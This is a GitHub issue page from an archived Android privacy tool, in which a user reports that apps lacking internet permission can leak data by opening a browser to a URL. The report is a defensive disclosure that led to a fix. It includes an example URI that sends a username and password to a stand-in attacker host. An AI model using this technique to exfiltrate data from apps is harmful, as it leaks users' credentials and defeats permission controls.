Skip to content
This repository has been archived by the owner on Sep 6, 2019. It is now read-only.

Block URI intents with internet #15

Closed
pulser opened this issue Jun 13, 2013 · 1 comment
Closed

Block URI intents with internet #15

pulser opened this issue Jun 13, 2013 · 1 comment

Comments

@pulser
Copy link

pulser commented Jun 13, 2013

It's possible to send data without the internet permission, if you make a URL containing the data to send, and send that to a server listening for a GET request.

ie. an app can request a browser to the URI of "www.nastyhacker.example.org/leechdata.php?datatoleech=UserName%20T0ps3cr3tP4ssw0rd" or similar...

I suggest if an app doesn't have internet permission, it gets blocked from calling HTTP URIs

@M66B
Copy link
Owner

M66B commented Jun 14, 2013

Version 0.17

Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants